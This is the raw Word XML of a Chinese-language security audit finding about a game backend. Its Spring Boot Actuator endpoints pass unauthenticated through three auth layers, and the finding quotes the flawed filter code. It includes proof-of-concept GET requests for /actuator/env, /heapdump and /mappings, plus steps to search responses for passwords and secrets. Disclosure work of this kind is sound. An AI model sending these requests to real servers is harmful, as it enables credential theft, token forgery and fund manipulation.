          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞2：Spring Boot Actuator 管理端点全量无认证暴露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="21"/>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：Spring Boot Actuator 管理端点全量无认证暴露（三道鉴权层均绕过）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="22"/>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src/main/java/com/gameBack/mjservice/config/SecurityConfig.java:isPermitPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="23"/>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：未授权访问 / 敏感信息泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="24"/>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5"/>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：未授权（无需任何凭证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="26"/>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SecurityConfig.isPermitPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（精确匹配）及所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前缀路径纳入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PERMIT_MATCHER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，该 Matcher 在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>securityFilterChain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中用于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>permitAll()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>——代码注释"原在 PERMIT_MATCHER 中 permitAll"以及"需放行至后续 Filter 的路径"均可证实这一用法。Spring Security 层完全放行所有 Actuator 路径，不要求任何身份认证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter.isNoTokenPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的首个判断为"若路径不以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 开头则直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"，导致 Token 鉴权过滤器对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shouldNotFilter=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（完全跳过）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SIGN_TEST_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 全为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 模式，Actuator 路径也不匹配任何规则，签名校验同样跳过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">至此，三道安全机制（Spring Security、TokenAuthFilter、SignAuthTestFilter）对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均无任何防护，任意互联网来源均可直接访问。在以下场景下危害极高：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端点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潜在危害</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/actuator/env</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泄露数据库连接串（含密码）、Redis 密码、JWT 签发密钥、第三方 API Key/Secret 等所有配置属性</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/actuator/heapdump</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下载完整 JVM 堆内存镜像，可提取内存中明文 Token、会话数据、用户隐私信息</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/actuator/mappings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泄露全量 HTTP 路由映射，辅助枚举所有 API 端点（含内部接口）</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/actuator/loggers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动态修改日志级别，迫使系统输出敏感调试信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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/actuator/beans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暴露完整 Spring Bean 拓扑，辅助构造进一步攻击链</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="27"/>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b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Spring Security 层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PERMIT_MATCHER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isPermitPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/**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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>securityFilterChain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 据此执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>permitAll()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，Spring Security 放行，不触发认证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TokenAuthFilter 层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isNoTokenPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 检测到路径不以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 开头，直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w: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 xml:space="preserve"> → 过滤器整体跳过，Token 校验逻辑从未执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SignAuthTestFilter 层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SIGN_TEST_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 全量为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前缀，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不命中任何 pattern → </w:t>
      </w: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 xml:space="preserve"> → 签名校验跳过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>三层全部放行，无任何拦截。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="31"/>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：若攻击者通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 获取数据库连接凭证，可直接访问数据库操纵用户余额、资金流水；若获取 JWT/Token 签发密钥，可伪造任意权限级别的 Token 调用提现审核、资金调整等高权限接口，资金损失风险极高。</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Spring Security 放行层：SecurityConfig.java</w:t>
              <w:br/>
              <w:t>// isPermitPath() —— PERMIT_MATCHER 的核心判断逻辑</w:t>
              <w:br/>
              <w:t>private static boolean isPermitPath(String normalizedPath) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath == null) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("/".equals(normalizedPath)) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (isAdminPublicPath(normalizedPath)) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath.equals("/test") || normalizedPath.startsWith("/test/")) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath.startsWith("/ws/")</w:t>
              <w:br/>
              <w:t xml:space="preserve">            || normalizedPath.startsWith("/api/") || normalizedPath.startsWith("/mjservice/api/")) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath.equals("/actuator") || normalizedPath.startsWith("/actuator/")) return true;  // ← 漏洞点：所有 Actuator 路径无条件放入 permitAll 白名单</w:t>
              <w:br/>
              <w:t xml:space="preserve">   // if (normalizedPath.endsWith(".html")) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath.equals("/actuator") || normalizedPath.startsWith("/actuator/")) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return false;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// PERMIT_MATCHER 实例 —— 在 securityFilterChain 中对应 permitAll()</w:t>
              <w:br/>
              <w:t>// 注释"原在 PERMIT_MATCHER 中 permitAll"证实该 matcher 用于 permitAll 规则</w:t>
              <w:br/>
              <w:t>private static final RequestMatcher PERMIT_MATCHER = (HttpServletRequest request) -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String decodedPath = URL_PATH_HELPER.getPathWithinApplication(request);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (decodedPath == null) decodedPath = "";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (containsPathTraversal(decodedPath)) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String normalizedPath = getNormalizedPath(request);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return isPermitPath(normalizedPath);  // ← /actuator/** → true → Spring Security permitAll() 放行</w:t>
              <w:br/>
              <w:t>};</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Token 鉴权过滤器：TokenAuthFilter.java</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>// isNoTokenPath() —— 路径不以 /api/ 开头则直接豁</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>免 Token 校验</w:t>
              <w:br/>
              <w:t>private static boolean isNoTokenPath(String normalizedPath) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!normalizedPath.startsWith("/api/")) return true;  // ← /actuator/** 命中此条，直接返回 true → TokenAuthFilter 跳过</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (String pattern : NO_TOKEN_PATTERNS) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (ANT_PATH_MATCHER.match(pattern, normalizedPath)) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return false;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>@Override</w:t>
              <w:br/>
              <w:t>protected boolean shouldNotFilter(HttpServletRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String normalizedPath = getNormalizedPath(request);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return isNoTokenPath(normalizedPath);  // ← /actuator/** → shouldNotFilter=true → Token 校验完全不执行</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 签名校验过滤器：SignAuthTestFilter.java</w:t>
              <w:br/>
              <w:t>// SIGN_TEST_PATTERNS 全量为 /api/** 模式，/actuator/** 不命中任何规则</w:t>
              <w:br/>
              <w:t>private static final String[] SIGN_TEST_PATTERNS = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/accelerator/**","/api/game/**","/api/home","/api/marquee/**",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/miner/**","/api/fragment/**","/api/offline/**",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/power/**","/api/priz/**","/api/ranking/**",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/resource/**","/api/share/**","/api/signIn/**","/api/prize/**",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/slotUnlock/**","/api/task/**","/api/user/**","/api/enums/**","/api/levelReward/"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← /actuator/** 不在任何模式中 → shouldNotFilter=true → 签名校验跳过</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/actuator/env HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器地址&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Connection: close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/actuator/heapdump HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器地址&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Connection: close</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/actuator/mappings HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器地址&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Connection: close</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32"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">直接发送无任何认证头的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /actuator/env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求至目标服务器。若响应返回 JSON 数据而非 401/403，则漏洞确认存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在响应 JSON 中搜索 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
